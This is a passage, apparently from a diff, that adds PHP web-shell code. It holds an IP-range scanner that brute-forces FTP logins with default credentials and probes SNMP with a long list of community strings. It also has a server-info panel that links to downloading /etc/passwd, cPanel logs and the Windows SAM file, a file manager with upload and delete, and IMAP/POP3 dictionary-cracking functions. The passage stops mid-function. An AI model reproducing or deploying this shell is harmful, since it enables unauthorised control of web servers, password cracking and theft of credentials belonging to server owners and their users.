+$page=$cqich=$nukech=$adminch=$userch=$vuln[1]; +if(strstr($page,'@CGIDIRS')) +foreach($cgi as $cg){ +$cqich=str_replace('@CGIDIRS',$cg,$page); +$url="http://$ip$cqich"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." 
<a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +elseif(strstr($page,'@ADMINDIRS')) +foreach ($admin as $cg){ +$adminch=str_replace('@ADMINDIRS',$cg,$page); +$url="http://$ip$adminch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +elseif(strstr($page,'@USERS')) +foreach ($users as $cg){ +$userch=str_replace('@USERS',$cg,$page); +$url="http://$ip$userch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +elseif(strstr($page,'@NUKE')) +foreach ($nuke as $cg){ +$nukech=str_replace('@NUKE',$cg,$page); +$url="http://$ip$nukech"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +else{ +$url="http://$ip$page"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." 
<a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +} +} +} +if(!empty($_REQUEST['smtprelay'])){ +if(checkthisporT($ip,25,$timeout)){ +$res=''; +$res=checksmtP($ip,$timeout); +if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR(); +} +} +if(!empty($_REQUEST['snmpscanner'])){ +if(checkthisporT($ip,161,$timeout,1)){ +$com=$_REQUEST['com']; +$coms=$res=""; +if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com; +foreach ($c as $v){ +$ret=snmpchecK($ip,$v,$timeout); +if($ret)$coms .=" $v "; +} +if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;} +flusheR(); +} +} +if(!empty($_REQUEST['ftpscanner'])){ +if(checkthisporT($ip,21,$timeout)){ +$usps=explode(',',$_REQUEST['userpass']); +foreach ($usps as $v){ +$user=substr($v,0,strpos($v,':')); +$pass=substr($v,strpos($v,':')+1); +if($pass=='[BLANK]')$pass=''; +$ftp=@ftp_connect($ip,21,$timeout); +if ($ftp){ +if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";} +} +flusheR(); +} +} +} +if($output)echo "<hr size=1 noshade>"; +flusheR(); +} +$time=time()-$start; +echo "Done! 
($time seconds)</font>"; +if(!empty($buglist))unlink($buglist); +} +else{ +$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>"; +echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>"; +$host = substr($host,0,strrpos($host,".")); +echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" 
size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td 
width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>"; +} +} +function sysinfO(){ +global $windows,$disablefunctions,$safemode; +$cwd= getcwd(); +$mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program="; +$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; +if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"]; +$osver=$tsize=$fsize=''; +if ($windows){ +$osver = " (".shelL("ver").")"; +$sysroot = shelL("echo %systemroot%"); +if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"]; +if (empty($sysroot)) $sysroot = getenv("windir"); +if (empty($sysroot)) $sysroot = "Not Found"; +if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%"); +for ($i=66;$i<=90;$i++){ +$drive= chr($i).':\\'; +if (is_dir($drive)){ +$fsize+=@disk_free_space($drive); +$tsize+=@disk_total_space($drive); +} +} +}else{ +$fsize=disk_free_space('/'); +$tsize=disk_total_space('/'); +} +$disksize="Used spase: ". showsizE($tsize-$fsize) . " Free space: ". showsizE($fsize) . " Total space: ". 
showsizE($tsize); +if (empty($CPU)) $CPU = "Unknow"; +$os = php_unamE(); +$osn=php_unamE('s'); +if(!$windows){ +$ker = php_unamE('r'); +$o=($osn=="Linux")?"Linux+Kernel":$osn; +$os = str_replace($osn,"${mil}$o\">$osn</a>",$os); +$os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os); +$inpa=':'; +}else{ +$sam = $sysroot."\\system32\\config\\SAM"; +$inpa=';'; +$os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os); +} +$software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']); +echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>"; +if ($windows){ +echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a 
href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>"; +} +else +{ +echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">"; +if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">"; +if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found"; +echo "</td></tr>"; +} +$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR'); +echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." 
";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". 
$ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>"; +} +function checksuM($file){ +global $et; +echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et"; +} +function listdiR($cwd,$task){ +$c= getcwd(); +$dh = opendir($cwd); +while ($cont=readdir($dh)){ +if($cont=='.' || $cont=='..')continue; +$adr = $cwd.DIRECTORY_SEPARATOR.$cont; +switch ($task){ +case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '2':if(is_file($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break; +case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break; +case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; +case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break; +case 
'7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break; +} +if (is_dir($adr)) listdiR($adr,$_REQUEST['task']); +} +} +if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}} +if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}} +function filemanager(){ +global $windows,$msgbox,$errorbox,$t,$et,$hcwd; +$cwd= getcwd(); +$table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">"; +$td1n="<td width=\"22%\" bgcolor=\"#666666\">"; +$td2m="<td width=\"22%\" bgcolor=\"#808080\">"; +$td1i="<td width=\"5%\" bgcolor=\"#666666\">"; +$td2i="<td width=\"5%\" bgcolor=\"#808080\">"; +$tdnr="<td width=\"22%\" bgcolor=\"#800000\">"; +$tdw="<td width=\"22%\" bgcolor=\"#006E00\">"; +if (!empty($_REQUEST['task'])){ +if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7; +if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6; +echo "<font color=blue><pre>"; +listdiR($cwd,$_REQUEST['task']); +echo "</pre></font>"; +}else{ +if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){ +if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){ +$title="Destination"; +$ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV']; +$dis =(!empty($_REQUEST['cP']))?'Copy':'Move'; +}else{ +$ad = $_REQUEST['rN']; +$title ="New name"; +$dis = "Rename"; +} +if (!!empty($_REQUEST['deS'])){ +echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 
name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>"; +}else{ +if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']); +else{ +copy($ad,$_REQUEST['deS']); +if (!empty($_REQUEST['mV']))unlink($ad); +} +} +} +if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) { +$dh = opendir($_REQUEST['deL']); +$d=""; +while ($cont=readdir($dh)){$d++;} +if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}} +if (!empty($_FILES['uploadfile'])){ +move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']); +echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>"; +} +$select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\""; +if (!empty($_REQUEST['newf'])){ +if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");} +if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);} +} +if ($windows){ +echo "$table<td><b>Drives:</b> "; +for ($i=66;$i<=90;$i++){$drive= chr($i).':'; +if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";} +} +echo $et; +} +echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>"; +$file=array();$dir=array();$link=array(); +if($dirhandle = opendir($cwd)){ +while ($cont=readdir($dirhandle)){ +if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont; +elseif 
(is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont; +else $link[]=$cont; +} +closedir($dirhandle); +sort($file);sort($dir);sort($link); +echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>"; +$i=0; +foreach($dir as $dn){ +echo "<tr>"; +$i++; +$own="Unknow"; +$owner=posix_getpwuid(fileowner($dn)); +$mdate=date("Y/m/d H:i:s",filemtime($dn)); +$adate=date("Y/m/d H:i:s",fileatime($dn)); +$diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>"; +if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; +if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2; +echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">"; +if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>"; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>"; +echo "$cl1------</td>"; +echo $cl2.$diraction; +echo "</tr>" ; +flusheR(); +} +foreach($file as $fn){ +echo "<tr>"; +$i++; +$own = "Unknow"; +$owner = 
posix_getpwuid(fileowner($fn)); +$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>"; +$mdate = date("Y/m/d H:i:s",filemtime($fn)); +$adate = date("Y/m/d H:i:s",fileatime($fn)); +if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; +$size = showsizE(filesize($fn)); +if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2; +echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">"; +if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>"; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>"; +echo "$cl1$size</td>"; +echo $td2m.$fileaction; +echo "</tr>" ; +flusheR(); +} +foreach($link as $ln){ +$own = "Unknow"; +$i++; +$owner = posix_getpwuid(fileowner($ln)); +$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option 
value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>"; +$mdate = date("Y/m/d H:i:s",filemtime($ln)); +$adate = date("Y/m/d H:i:s",fileatime($ln)); +if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; +echo "<tr>"; +$size = showsizE(filesize($ln)); +if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} +if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2; +echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">"; +if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>"; +echo $cl1."$own</td>"; +echo $cl1."$mdate</td>"; +echo $cl1."$adate</td>"; +echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>"; +echo "$cl1$size</td>"; +echo $cl2.$linkaction; +echo "</tr>" ; +flusheR(); +} +} +$dc = count($dir)-2; +if($dc==-2)$dc=0; +$fc = count($file); +$lc = count($link); +$total = $dc + $fc + $lc; +echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit 
class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b> Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et"; +} +} +function imaplogiN($host,$username,$password){ +$sock=fsockopen($host,143,$n,$s,5); +$b=namE(); +$l=strlen($b); +if(!$sock)return 
-1; +fread($sock,1024); +fputs($sock,"$b LOGIN $username $password\r\n"); +$res=fgets($sock,$l+4); +if ($res == "$b OK")return 1;else return 0; +fclose($sock); +} +function pop3logiN($server,$user,$pass){ +$sock=fsockopen($server,110,$en,$es,5); +if(!$sock)return -1; +fread($sock,1024); +fwrite($sock,"user $user\n"); +$r=fgets($sock); +if($r{0}=='-')return 0; +fwrite($sock,"pass $pass\n"); +$r=fgets($sock); +fclose($sock); +if($r{0}=='+')return 1; +return 0; +} +function imapcrackeR(){ +global $t,$et,$errorbox,$crack; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); 